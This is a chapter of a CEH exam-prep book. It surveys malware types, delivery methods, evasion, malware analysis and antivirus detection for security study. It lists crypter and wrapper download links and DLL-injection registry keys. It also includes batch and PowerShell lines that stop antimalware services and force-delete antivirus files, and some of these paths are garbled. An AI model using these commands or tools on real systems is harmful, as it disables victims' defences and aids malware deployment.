Chapter 4. Malware
This chapter covers the following CEH exam objectives:
• Understanding viruses
• Awareness of malware delivery mechanisms
• How Trojan horses function
• Insight into spyware
Malware Types
Malware is a rather broad term that applies to any software that has a malicious intent or purpose. There are many types of malware today. In addition, modern malware often falls into multiple categories. As one example, you might encounter a virus that spreads and then delivers spyware to infected computers. Malware is becoming increasingly common and, at least in some cases, more advanced.
Exam Alert
Objective Having a detailed knowledge of the various types of malware is critical for the CEH exam.
Trojan Horses
A Trojan horse is malware that appears to have a legitimate purpose but that delivers something malicious. This can be done in one of two ways. The attacker can write a new program that does something innocuous (weather monitor, poker game, etc.) but that has hidden functionality. That is the less common approach. The more common approach is to use a tool to wrap an existing program around malware. Then, a victim who installs the software also installs the malware.
Trojan horses are used for a wide range of purposes. They can be used to deliver spyware or backdoors. There are Trojan horses that disable firewalls, antivirus software, and other security measures. A Trojan horse may use a victim machine to send spam, start a denial of service (DoS) attack, or act as a proxy server for the attacker to route traffic through.
There are quite a few known Trojan horses. They all typically communicate on specific TCP ports. Table 1.1 lists several of these ports. Note that Table 4.1 uses the term RAT, which stands remote access Trojan. The primary purpose of this type of Trojan is to give the attacker remote access to the system.
Table 4.1 Some Known Trojan Horses and Their Specific TCP Ports
While the term Trojan horse is used to describe any software that is designed to deliver a malicious payload, there are specialized Trojan horses, including:
• Remote access Trojan: This type of Trojan is specifically designed to deliver remote access utilities to the target system.
• Proxy trojan: This type of Trojan essentially turns the target system into a proxy server, so the attacker can use that system as a base to attack other systems.
• FTP Trojan: This type of Trojan initiates an FTP server on the target machine so the attacker can upload or download files.
• Data stealing Trojan: As the name suggests, this type of Trojan is designed to deliver spyware and steal data. A subset of this type, called a banking Trojan, specifically targets financial data on the target system.
• Destructive Trojans: As the name indicates, this type of Trojan delivers malware that will cause damage to the target system. It might delete system files, interfere with system operations, or conduct other types of destructive activities.
• Command shell Trojan: This type of Trojan delivers some sort of command line remote access tool. For example, netcat is often used by network administrators to communicate between machines. A command shell Trojan might deliver netcat and have it listen on a machine while users connect and execute commands.
• Covert channel tunneling tool (CCTT) Trojan: This type of Trojan creates arbitrary data transfer channels in the data streams authorized by a network access control system.
• Defacement Trojan: This type of Trojan is used to deface either a website or an application. It is possible to find on the internet defacement Trojans that can deface standard Windows applications such as the Calculator app.
The basic process of delivering a Trojan involves these steps:
1. Create a new Trojan packet using one of the many tools available on the internet.
2. Create a dropper that installs the malicious code on the target system.
3. Create a wrapper using wrapper tools to install the Trojan on a victim's computer.
4. Propagate the Trojan.
5. Execute the dropper.
6. Execute whatever malicious code you wish.
Not every Trojan delivery involves all these steps, but many do.
eLiTeWrap is a common Trojan horse tool that is easily found on and downloaded from the internet. It is easy to use. Essentially, it can bind any two programs together. Using a tool such as this one, anyone can bind a virus or spyware to an innocuous program such as a shareware poker game. This would lead to a large number of people downloading what they believe is a free game and unknowingly installing malware on their systems.
The eLiTeWrap tool is a command line tool that is very easy to use. Just follow these steps (see Figure 4.1):
Figure 4.1 eLiTeWrap
DarkHorse Trojan Virus Maker is another tool for wrapping programs. It has a nice GUI interface that makes it even easier to work with than eLiTeWrap. You can see this tool in Figure 4.2.
Figure 4.2 DarkHorse Trojan Maker
There are many more tools for wrapping programs. A few are listed here:
• Advanced File Joiner https://download.cnet.com/Advanced-File-Joiner/3000-2094_4-169639.html
• Hidden Cry https://pentesttools.net/hidden-cry-windows-crypter-decrypter-generator-with-aes-256-bits-key/
• Exe2vbs https://github.com/rapid7/metasploit-framework/blob/master/tools/exploit/exe2vbs.rb
• IExpress Wizard https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/iexpress-wizard-for-win-server
In addition to these wrappers, there are a number crypters available, as well:
• SwayzCryptor https://guidedhacking.com/threads/swayzcrypter.5778/
• Cypherx https://cypherx-crypter.updatestar.com/en
• Java Crypter https://www.secrethackersociety.com/product/java-crypter/
• BetaCrypt https://www.secrethackersociety.com/product/betacrypt/
• Spartan Crypter https://www.silentexploits.com/spartan-crypter/
• BitCrypter https://www.crypter.com/
Remember that a Trojan horse can be used to deliver anything. So sometimes Trojan horses are categorized by what they deliver. The following are some of the many types of Trojan horses:
Backdoor
As the name suggests, a backdoor is malware that gives the attacker remote access to the target machine. One common way this can be done by using a Trojan horse to wrap a remote desktop program in some other program. Then, when the target installs the harmless program, they are also installing remote desktop capabilities. A common remote desktop tool for this is Timbuktu. Timbuktu is very much like Microsoft Remote Desktop, but it is open source and free.
Spyware
As discussed briefly in Chapter 3, “System Hacking,” spyware is software that monitors a user's computer in some way. It can be a keylogger, screen grabber, etc. One reason spyware is so common is that there are legal uses for it. For example, you can easily find software designed for parents to monitor their minor children online; this is simply legal spyware. Similarly, there are tools marketed for companies to monitor employees on the company network; again, this is legal spyware. However, it is possible to use such tools for illegal purposes. In addition, there are tools designed as illegal spyware. Some of them purport to be security applications, but they are really spyware. The following tools fall into this category:
• AntiVIrus Gold
• MacSweeper
• Spy Wiper
• Spysheriff
• Windows Police Pro
The very first spyware reported was found in a Usenet newsgroup in 1995. The problem has grown enormously since then. The antivirus company Kaspersky defines four types or categories of spyware:
• Trojan spyware: This type of spyware enters devices via Trojan malware, which delivers the spyware program.
• Adware: This type of spyware may monitor you to sell data to advertisers or serve deceptive malicious ads.
• Tracking cookie files: This type of spyware can be implanted by a website to follow you across the internet.
• System monitors: This type of spyware track any activity on a computer, capturing sensitive data such as keystrokes, sites visited, email addresses, and more. Keyloggers typically fall into this group.
Ransomware
Ransomware, which is a growing problem, is often delivered as a virus or Trojan horse. The distinguishing characteristic of ransomware is that it blocks some use of your computer and demands payment. It may, for example, encrypt files then demand payment for the decryption key; this is also known as crypto ransomware. Or the ransomware may lock your entire computer and demand payment.
One of the most widely known ransomware attacks was CryptoLocker. This ransomware was first discovered in 2013. CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected. CryptoWall is a variant of CryptoLocker first found in August 2014. It looked and behaved much like CryptoLocker. In addition to encrypting sensitive files, it would communicate with a command and control server and even take a screenshot of the infected machine. By March 2015, a variation of CryptoWall was discovered to be bundled with the spyware TSPY_FAREIT.YOI; it actually steals credentials from the infected system in addition to holding files for ransom. WannaCry is a more recent ransomware that spread rapidly across a number of computer networks in May 2017. After infecting a Windows computers, it encrypted the files on the PC's hard drive, making them impossible for users to access, and then the perpetrator demanded a ransom payment in bitcoin in order to decrypt them.
Another example occurred in 2020, when Universal Health Services was hit by a ransomware attack. Although no one is certain, many analysts believe the specific ransomware in this case was malware named Ryuk. Whatever the name of the ransomware, the attack caused $67 million in damages. You can learn more about Ryuk at https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/.
Rootkits
Rootkits, which were introduced in Chapter 3, “System Hacking,” are examined again in this section. A rootkit is malware that is used to gain administrative-level privileges. It is based on the term root, which refers to the administrator in Linux. An intruder installs a rootkit on a computer after first obtaining user-level access. There are many ways to do this. One is to take advantage of a known vulnerability. Another method is cracking a password. The rootkit then collects user IDs and passwords to other machines on the network, thus giving the hacker root, or privileged, access.
There are actually several types of rootkits. The major types are listed here:
• Bootloader rootkit: This type of rootkit replaces the original boot loader with one that is controlled by the attacker.
• Kernel rootkit: This type of root kit either adds malicious code or replaces the original OS kernel or device drivers.
• Library rootkit: This type of root replaces certain libraries with fake libraries controlled by the attacker.
• Hypervisor rootkit: This type of rootkit functions as a hypervisor and modifies the boot sequence of the computer system to load the host operating system as a virtual machine.
• Hardware/firmware rootkit: This type of rootkit is much less common than the others. It is a rootkit in hardware devices or platform firmware.
• Application rootkit: This type of rootkit replaces normal application binaries with malicious code. Such a rootkit can also work by modifying the behavior of existing applications by injecting malicious code.
Fileless Malware
Fileless malware has become a growing threat. This type of malware does not require the installation of a file on the target system. Instead, it uses existing system programs—legitimate programs—to attack the target system. A common example would be the use of PowerShell in Windows. PowerShell is a scripting language first introduced in Windows 7. It provides a great deal of functionality that can be misused. It is possible to do any number of activities in PowerShell. For example, the following two commands can both stop a service:
service Stop-Service -displayname "Antimalware Service Executable" get-process antivirus.exe| StopProcess
It is also possible to use the Windows Management Interface (WMI) to perform similar tasks. WMI has a number of classes that can be used in scripts to gather information and perform tasks. A few of these classes are listed here:
• Win32_ApplicationService: This WMI class represents any installed or advertised component or application available on the system.
• Win32_Account: This abstract WMI class contains information about user accounts and group accounts known to the Windows system.
• Win32_ComputerSystem: This WMI class represents a computer system operating in a Windows environment.
• Win32_LogicalDisk: This WMI class represents a data source that resolves to an actual local storage device on a Windows system.
You can get more information on WMI from the following sources:
• WMI Samples: https://www.activexperts.com/admin/scripts/wmi/
• Example: Getting WMI Data from the Local Computer: https://docs.microsoft.com/en-us/windows/win32/wmisdk/example--getting-wmi-data-from-the-local-computer
The net command in Windows is a standard command line tool that has many variations and that can also be used for fileless malware. The following are some examples:
• net use: This command connects/disconnects the computer from a shared resource or allows the user to view information about the current computer connections.
• net view: This command displays the computers in the local domain.
• net view \ComputerName: This command shows the shares on the specified computer.
• net file: This command displays all the open shared files on a server and the lock ID.
• net session\ComputerName: This command lists the sessions on the specified machine.
• net session: This command lists all sessions on the current machine.
• net share sharename: This command displays the local share name.
net start service
net stop service
Common services
browser
alerter
messenger
“routing and remote access”
schedule
spooler
PowerShell, WMI, and the net command were all designed for legitimate uses by Windows administrators. Fileless malware simply exploits these tools.
Botnet
A botnet is a network of computers. One computer is the command and control node, and the others are zombie machines that are not willing participants in the activity. One way a botnet can be accomplished is by sending a Trojan horse that has a payload which gives the command and control node control over the machine. Attackers can use a botnet for whatever purpose they want. An entire botnet can be used, for example, to launch a massive distributed denial of service (DDoS) attack against a target. Or a botnet can be used for its distributed computing power to crack passwords.
Advanced Persistent Threats
Advanced persistent threats are, as the name suggests, advanced attacks. They are often perpetrated by nation-state actors. The definition is in the name: Such an attack must be advanced, and it must also be persistent (that is, take place over a long period of time). Such attacks are usually subtle and hard to detect. The term advanced persistent threat is said to have been coined by the U.S. Air Force in 2006. These attacks often involve multiple separate pieces of malware.
Exploit Kits
Exploit kits, sometimes called crimeware toolkits, are platforms for delivering exploits and payloads to a target. Many of them are multipurpose and can deliver spyware, Trojan horses, backdoors, rootkits, and other malware. A few well-known exploit kits are:
• Terror
• Sundown
• Neutrino
• Angler
• RIG Exploit Kit
How Malware Spreads
Malware can spread in a number of different ways. The following are the most common ways:
• Email attachments
• Instant messaging attachments
• Websites that are infected
• Portable media
• Any download from the internet
• File sharing services
• Direct installation over wireless networking
When distributing malware through an infected website, the attacker can use a number of techniques to get more victims. Blackhat search engine optimization (SEO) is one popular method that involves simply using illicit means to get the infected site’s ranking higher in search engines. Click-jacking is a process of getting users to click on something. When delivering malware via websites, the attacker may set up a fake website to infect visitors. Another approach is to inject malware into legitimate websites.
In addition to website-based attacks, malware can be delivered via exploiting flaws in a browser or simply attaching to an email and using social engineering to convince the user to open the attachment. Malvertising is another method of malware delivery; with this method, the malware is embedded in legitimate ads or entire ad networks.
Malware can also spread via compromised applications (in Trojan horses). Malware can be attached to a legitimate file and spread when users download or install the legitimate file. You saw earlier in this chapter how simple and free tools such as eLiTeWrap can be used to accomplish this.
Exam Alert
Objective The CEH exam will absolutely ask you about the various delivery mechanisms for malware. Make sure you are very familiar with them.
Malware Components
Malware can be made of various components. Of course, not all malware has every component, but Table 4.2 provides describes the components that are often part of malware.
Table 4.2 Some Components of Malware
Malware Evasion Techniques
Obviously, the creator of malware does not want the malware to be detected. We have already seen some methods for avoiding detection, including hiding the malware in a Trojan horse. Another method is changing the file extension. Adding random bits at the end of a file to avoid antivirus signatures is another method.
There are also some rather technical techniques for covertly executing code on systems. One technique, DLL injection, involves causing code to execute within the address space of some other process. This is accomplished by forcing the targeted program to load a DLL (dynamic linked library). Multiple techniques can be used to accomplish this. For example, specific registry keys can be useful. Every DLL is listed in the registry entry
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindowsAppInit_
DLLs are loaded into every process that loads User32.dll, and User32.dll is used by many programs. Therefore, if an attacker can get a DLL listed in that registry entry, it will be loaded along with a great many other programs.
Another registry key that can be used for DLL injection is
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerAppCertDLLs/
Any DLL listed in this registry entry will be loaded into every process that calls the Win32 API functions CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, CreateProcessWithTokenW, and WinExec. This also encompasses a large number of programs.
In addition to DLL injection, process hollowing is another technical method for hiding malware. In this technique, malware masquerades as a genuine system process that poses no threat of crashing the process. The key to process hollowing is to create a process in a suspended state by loading the process into memory and suspending its main thread. The program then remains inert until an external program resumes the primary thread, at which point the program starts running.
Viruses
A computer virus is a program that self-replicates. Some sources define a virus as a file that must attach to another file, such as an executable, in order to run. While this definition is sufficient to define a virus, most viruses do far more than simply replicate.
Types of Viruses
There are many different types of viruses. In this section we briefly look at some of the major virus types.
Viruses can be classified by either the method they use for propagation or their activities on the target computers:
• File virus: A file virus is executed like any other executable on a system. It is a common type of virus.
• System virus: A system virus attempts to compromise some portion of a system. For example, a boot sector virus attempts to infect the boot process of the target system.
• Macro virus: A macro virus infects the macros in Microsoft Office documents. Microsoft Office products such as Word and Excel allow users to write mini-programs called macros to automate tasks. A macro virus can be written into a macro in some business applications. For example, Microsoft Outlook is designed to allow a programmer to write scripts using a subset of the Visual Basic programming language called Visual Basic for Applications (VBA). This scripting language is, in fact, built into all Microsoft Office products. Programmers can also use the closely related VBScript language. Both languages are quite easy to learn. If a macro virus script is attached to an email and the recipient is using Outlook, then the script can execute and do any number of things, including scan the address book, look for addresses, send out email, or delete email.
• Multi-partite virus: A multi-partite virus can attack a computer in multiple ways, such as by infecting the boot sector of the hard disk and one or more files.
• Cluster virus: A cluster virus modifies some directory table so that it points users to the virus rather than to the actual program. For example, it might alter the file that maintains information for the file system (MFT in Windows).
• Memory-resident virus: A memory-resident virus installs itself and then remains in RAM from the time the computer is booted up to when it is shut down.
• Armored virus: An armored virus uses techniques that make it hard to analyze. Code confusion is one such method. The code is written such that if the virus is disassembled, the code won’t be easily followed. Compressed code is another method for armoring a virus.
• Sparse infector virus: A sparse infector virus attempts to elude detection by performing its malicious activities only sporadically. With a sparse infector virus, the user sees symptoms for a short period and then sees no symptoms for a time. In some cases, a sparse infector virus targets a specific program but executes only every 10th time or 20th time that the target program executes. Or a sparse infector virus may have a burst of activity and then lie dormant for a period of time. There are a number of variations on the theme, but the basic principle is the same: This type of virus reduces the frequency of attack and thus reduces the chances for detection.
• Polymorphic virus: A polymorphic virus literally changes its form from time to time to avoid detection by antivirus software.
• Metamorphic virus: This is a special case of a polymorphic virus that completely rewrites itself periodically. This type of virus is very rare.
• Boot sector virus: Some sources list boot sector viruses separately from system and file viruses. As the name suggests, this type of virus infects the boot sector of the drive. It can be difficult to find antivirus software for this type of virus, because most antivirus software runs within the operating system, not in the boot sector.
• Overwriting/cavity virus: This type of virus embeds itself in a host file and overwrites part of the host file so that it does not increase the length of the file.
• File extension virus: This type of virus changes the extension of a file. So, for example, such a virus might make a .vbs (Visual Basic script) file appear to be a .txt (text) file.
• Terminate and stay resident (TSR) virus: This type of virus remains permanently in the memory during an entire work session, even after the target host’s program is executed and terminated. In some cases, it can be removed by rebooting the system; in other cases, even a reboot will not remove the virus.
• Companion virus: This type of virus creates a companion file for each executable file, so it might be associated with a legitimate program.
Creating a Virus
As you can probably imagine, there are tools freely available on the internet for creating viruses. One well-known tool is TeraBIT Virus Maker. You can see this tool in Figure 4.3.
Figure 4.3 TeraBIT Virus Maker
Some of the actions you can select are merely annoying, such as avoiding opening Notepad. Others are quite malicious, such as formatting all hard drives. Notice that there is also an option to spread a virus with removable devices.
TeraBIT is not the only easy-to-use GUI virus-making tool available. Another interesting GUI virus maker is Virus Maker from BlackHost (http://www.blackhost.xyz). There are several interesting things about this tool. In addition to doing typical things like changing mouse behavior, Virus Maker can open a website. This makes it useful for penetration testing. You can have it simply open a website that describes why a user should be careful with attachments. You can see this tool in Figure 4.4.
Figure 4.4 BlackHost Virus Maker
There are, of course, many tools for making worms as well. Recall that a worm is just a special case of a virus that self-propagates. In fact, many things we call viruses today are really worms. One of the most well-known worm makers is the Internet Worm Maker Thing. You can see this tool in Figure 4.5.
Figure 4.5 Internet Worm Maker Thing
In addition to using tools to write viruses, you can write them by using scripts or batch files. For example, here is a simple VBScript virus:
Dim msg, sapi
msg="You have violated security policies"
Set sapi=CreateObject("sapi.spvoice”)
sapi.Speak msg
This virus is particularly useful for penetration testing, as it causes no harm to the target computer. Instead, it simply embarrasses the computer operator by pointing out that they downloaded an attachment.
You can, of course, alter the message to suit your needs. A bit of investigation online into the Microsoft Speech API will also show you some additional variations you can consider, such as this one:
sapi.Volume = 100 sapi.voice = .getvoices.item(0)
This is a VBScript script, so you should save it as a .vbs file. This script allows you to test whether users will click on an attachment, particularly one that is a script.
There are certainly more harmful batch files. For example, the following batch file, if executed by someone with administrative privileges, will kill antivirus processes:
tskill /A ZONEALARM tskill /A mcafe*
This can be followed with del to delete the files for that antivirus:
del /Q /F C:Program Fileskasper~1*.exe del /Q /F C:Program Fileskaspersky*.*
Note that /Q specifies quiet mode, which means the user does not get a prompt before the file is deleted. /F indicates to ignore read-only setting and delete the file anyway. Also note that in this example, only three specific antiviruses are mentioned. This can easily be modified to take out every antivirus on the market.
More recent versions of Windows don’t support tskill but do support the related command taskkill. taskkill is actually more powerful than tskill.
Logic Bombs
A logic bomb is software that does whatever its misdeed is when a particular condition (trigger) is met. Perhaps it will begin deleting the files on a web server on a given date. There have been multiple cases of programmers being charged with felonies after putting logic bombs on their company systems to delete files should their employment be terminated.
In 2019, a contract employee for Siemens, David Tinley, pleaded guilty to charges of creating a logic bomb. The purpose of his logic bomb was to, after a period of time, cause the software he had developed for the company to malfunction. He planned for the logic bomb to cause Siemens to have to call him back to fix it so he could make more money.
Protecting Against Malware
Using antivirus software can be a good first step in protecting a system from viruses. (Antivirus is the term still used, though we usually mean antimalware because such systems protect against all forms of malware.) But it is not the only technique.
Indicators of Malware
Before you can defend against malware, you need some indication that it is present. Some malware can be sophisticated enough to provide very few clues as to its presence. However, most malware attacks become known through the disruption they cause. A few common indicators that might suggest malware is on a system include:
• Processes take more resources and time.
• Files and folders are missing.
• The system suddenly run out of storage space.
• Files and folders are missing.
• The computer freezes frequently.
• The computer crashes frequently (on Windows giving a BSOD [blue screen of death]).
• Unexplained popup windows appear.
• Files or folders are in places where they should not be.
Sheep Dipping
When sheep ranchers purchase a new sheep, they first dip the sheep in a liquid designed to kill any parasites before introducing the sheep to the rest of the flock. In technology, a similar process can be accomplished with software. You can set up an isolated machine, or even a virtual machine, and install suspect software on it. Then you can run a range of process monitors to find out precisely what this software does before it is authorized for use on the network. This process, like the process sheep ranchers use, is called sheep dipping.
Sandboxing refers to putting something into an isolated environment in order to test it. Virtual machines are often used for this purpose. You can use a physical machine, but virtual machines are used more often for this purpose.
Backups
Ransomware often works by encrypting a user's files and demanding payment to allow the user access to the data. If you are attacked with ransomware and have a known good recent backup of the infected file, you can simply clean the machine and restore the known good backup and avoid paying the ransom. How do you know a backup is good? First, before backing up, you need to do a complete virus scan on the system you are backing up. Then, once the backup is complete, disconnect from the network. That way, a virus cannot move to your backup media. This is referred to as air gapping, as in there is nothing but air between your backup and the network—no wired or wireless connections, no Bluetooth, no connection of any kind.
Malware Analysis
Exam Alert
Objective For the CEH exam, you need to have a basic understanding of malware analysis.
Even when you have a sheep dip computer, you need to have a process for analyzing software to determine if it is malware. There are primarily two types of analysis:
• Static analysis: This analysis involves going through the executable binary code without actually executing it to get a better understanding of the malware and its purpose.
• Dynamic analysis: This analysis involves actually executing the malware code so you can learn how it interacts with the host system and its impact on the system after it has been infected. Obviously, this should be done on an isolated machine.
BinText is a text extractor available from https://www.aldeid.com/wiki/BinText that can extract text from any kind of file. It allows you to find plain ASCII text, Unicode text, and resource strings, all of which provide useful information. You can see this tool in Figure 4.6.
Figure 4.6 BinText
IDA is another popular tool for malware reverse engineering. This tool, available at https://hex-rays.com/ida-pro/, comes in a free version and a pro version. It allows you to decompile a file and see the source code, as shown in Figure 4.7.
Figure 4.7 IDA Decompiler
Obviously, being able to read and understand a tool's output is a skill you need to learn if you want to be a good ethical hacker. That level of detail is not on the CEH exam, but you may consider learning IDA and decompiling apart from your CEH study.
There are tools for both static and dynamic analysis. Static analysis tools include:
• Portable Executable Scanner (pescan): https://tzworks.com/prototype_page.php?proto_id=15
• Resource Hacker: http://www.angusj.com/resourcehacker/
• PEView: https://www.aldeid.com
• UPX: https://upx.github.io
• Exeinfo PE: http://exeinfo.atwebpages.com
• ASPack: http://www.aspack.com
• Dependency-check: https://jeremylong.github.io
• Snyk: https://snyk.io
• Hakiri: https://hakiri.io
• RetireJS: https://retirejs.github.io
• WinDbg: http://www.windbg.org
• odjdump: https://sourceware.org
• ProcDump: https://docs.microsoft.com
Dynamic analysis tools include:
• CurrPorts: http://www.nirsoft.net
• PortExpert: http://www.kcsoftwares.com
• PRTG's Port sensor: https://kb.paessler.com
• Nagios Port Monitor: https://exchange.nagios.org
• Process Explorer: https://docs.microsoft.com
• Registry Viewer: http://accessdata.com
• RegScanner: http://www.nirsoft.net
• Process Hacker: http://processhacker.sourceforge.net
For Windows malware, the Sysinternals tool suite is very popular in dynamic analysis. There are several tools in this suite that allow you to view processes, handles, memory allocation, and more. You can see the Sysinternals Process Explorer in Figure 4.8.
Figure 4.8 Sysinternals Process Explorer
Process information is helpful in understanding malware because malware often uses excessive resources, and sometimes it is named like a system file but does not start up in the proper order for that system file. You can get the Sysinternals tools for free and learn more about them at https://docs.microsoft.com/en-us/sysinternals/.
Antivirus
Exam Alert
Objective The CEH exam expects you to know the various ways to detect malware.
In general, there are five ways a malware scanner might scan for virus infections. Many, if not most, modern antimalware applications use multiple methods, and they are outlined and defined here:
• Email and attachment scanning: Since a very common transmission method for a virus is email, email and attachment scanning is the most important function of any virus scanner. Some virus scanners actually examine your email on the email server before downloading it to your machine. Other virus scanners work by scanning your emails and attachments on your computer before passing them to your email program. And some even do both. The important point is that the email and its attachments should be scanned prior to the user having any chance to open them and release the virus on the system.
• Download scanning: Any time a user downloads any file from the Internet, there is a chance of downloading an infected file. Download scanning works much like email and attachment scanning but operates on files you select for downloading. When you click on a link on a web page, the target file is scanned before it is downloaded.
• File scanning: This is the type of scanning in which files on the system are checked to see whether they match any known virus. File scanning can be done on a scheduled basis, on demand, or both. It is a good idea to schedule your virus scanner to do a complete scan of the system periodically.
• Heuristic scanning: This type of scanning uses rules to determine whether a file or program is behaving like a virus. It looks at behavior, rather than at a list of known viruses. A new virus will not be on a virus definition list, so antivirus software must examine behavior to determine whether something is a virus. However, this process is not foolproof. Some actual virus infections will be missed, and some nonvirus files might be suspected of being viruses.
• Sandbox: Another approach is the sandbox approach. This basically means that you have a separate area, isolated from the operating system, in which a download or attachment is run. Then, if it is infected, it won’t infect the operating system.
It should be noted that many anti-malware systems advertise that they incorporate some level of machine learning in their malware detection. However, at this point, the most the CEH exam might ask you is whether there is such a thing as machine learning antimalware. You won’t need to know details. If you wish to learn more, see the following resources:
• Machine Learning for Malware Detection: https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf
• Machine Learning & Artificial Intelligence: https://www.mcafee.com/enterprise/en-us/solutions/machine-learning.html
What Next?
If you want more practice on this chapter's exam objectives before you move on, remember that you can access all of the Cram Quiz questions on the book web page. The next chapter covers packet sniffing and social engineering.